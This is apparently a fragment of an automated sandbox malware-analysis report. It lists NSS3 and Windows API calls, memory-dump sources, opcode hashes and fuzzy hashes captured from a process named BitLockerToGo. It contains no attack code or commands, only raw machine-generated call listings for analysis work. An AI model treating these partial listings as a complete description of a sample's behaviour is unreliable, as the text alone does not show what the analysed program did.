                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C694EB8,?), ref: 6C694884
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69484C
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69486D
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694899
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6948A9
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6948B8
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2226052791-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b2719e5061ae4760a570a45aecf6551c9f0b552ede21f8508b56ab8a73578c88
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ca48780c1060862f6253c6f6360cafa91c914cffd705929b4e07b53e7198a53d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2719e5061ae4760a570a45aecf6551c9f0b552ede21f8508b56ab8a73578c88
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09210B72F042419BEF005EA5EE8457677B8FF0B359B040535DE2987B11EB61E814C7A5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6D3D3F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: PORT_NewArena_Util.NSS3(00000800,6C6D3CAF,?), ref: 6C64BABF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C6D3CAF,?), ref: 6C64BAD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C6D3CAF,?), ref: 6C64BB08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C6D3CAF,?), ref: 6C64BB1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C6D3CAF,?), ref: 6C64BB3B
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D3CCB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D3CE2
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6D3CF8
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D3D15
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D3D2E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4030862364-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6588AE,-00000008), ref: 6C658A04
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C658A15
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(6C6588AE,00000000,00000132), ref: 6C658A27
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C658A35
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(6C6588AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C6588AE,-00000008), ref: 6C658A45
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(6C6588A6,?,6C6588AE,-00000008), ref: 6C658A4E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 65992600-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C69FE08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C69FE1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C69FE29
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C69FE3D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C69FE62
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?), ref: 6C69FE6F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 660648399-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7baba4a61de13080b1367e216d0039483a6c0929ca2ad2c0b258ec1fa8e3156d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53944ad987868d6fb3b1704a3a39015b8966aeacfb6eecb127cc08bbf7a46da0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7baba4a61de13080b1367e216d0039483a6c0929ca2ad2c0b258ec1fa8e3156d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D01108B6600206BBEB008F55DC40A5B7398AF55399F158034F91D87B12E731E926C7AA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C75892E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C758950
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C631A48), ref: 6C709BB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C631A48), ref: 6C709BC8
                                                                                                                                                                                                                                                                                                                                                          • getprotobynumber.WSOCK32(?), ref: 6C758959
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 6C758967
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?), ref: 6C75896F
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?), ref: 6C75898A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4143355744-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b9bcdf265a080732e62c3e10f68ffb97ebd4981be0b46fc7b70cec2fa5275fd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 477e78d8a90334e2425f974a8ac5eb0cf8946d5aec4eb71ed72c540bfdca0459
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9bcdf265a080732e62c3e10f68ffb97ebd4981be0b46fc7b70cec2fa5275fd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C011E9F2E241209BDB005FB99A0858E7BA8AF46378F454376DC0997BA1DB308C14C7D6
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D6846
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: calloc.MOZGLUE(00000001,0000019C,?,6C6315C2,?,?,?,?,?,00000001,00000040), ref: 6C63178D
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D6855
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C6455D0,00000000,00000000), ref: 6C69868B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: PR_NewLock.NSS3(00000000,00000000), ref: 6C6986A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C6986B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C6986C8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C6986E2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C6986EC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C698700
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D687D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6318DE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6318F1
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D688C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6318FC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C63198A
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6D68A5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6D68B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C709946
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5C16B7,00000000), ref: 6C70994E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: free.MOZGLUE(00000000), ref: 6C70995E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 200661885-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8d9acf8b3483402258e6f6509d174283e45ce5ca55b8bbeabd1e0b4cb18b3bb6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601FBB0A01B1746E7516B7648143E776F49F02389F16193AC46ACAB80EF61E4488BB9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C62AFDA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C62AFD3
                                                                                                                                                                                                                                                                                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6C62AF5C
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62AFC4
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C62AFCE
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e60409c953a4bdac64f52c13749042664b6762a21cafe9ec962861bf9a871be
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ab8471851440bec40dee323e73547e3a228e988feedac7d5c7e3a5c22bd0c1b9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e60409c953a4bdac64f52c13749042664b6762a21cafe9ec962861bf9a871be
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F91F471B002158FDB14CF59C850AEAB7F1BF85314F1985A8E865AB792C778ED02CF64
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C68FC55
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C68FCB2
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C68FDB7
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C68FDDE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: pkcs11:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4cc785a0920d2fa9dd2c6946cb36042aae468d95ac4ee0f06df2d6655ab96464
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2780801b6853c25defed6af608a34777daf72945b687625ef28ecb5e1ca0bafe
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cc785a0920d2fa9dd2c6946cb36042aae468d95ac4ee0f06df2d6655ab96464
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F65105B1A461129FEB009F65DD40BAA37B4EF45358F140025DE199BB51EB30E904CBBF
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C654860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C654894
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C656361,?,?,?), ref: 6C654A8F
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C656361,?,?,?), ref: 6C654AD0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$DecodeItem_QuickUtil
                                                                                                                                                                                                                                                                                                                                                          • String ID: ^jel$acel$acel
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1982233058-3071190905
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2629d3c1459b9e06c5350bdf746d285cf08b2f3cb8fb1a68fa1104c981a9d46
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 121addc0ea6bdc8e49e0fef76f60ea9f141157da376a69fb21543f977bf4540e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2629d3c1459b9e06c5350bdf746d285cf08b2f3cb8fb1a68fa1104c981a9d46
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49312938A0410597FB508A59DC90BBE7265DB82308FF00A7AD515F7BC8C6B49870879E
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C6B6E36
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B6E57
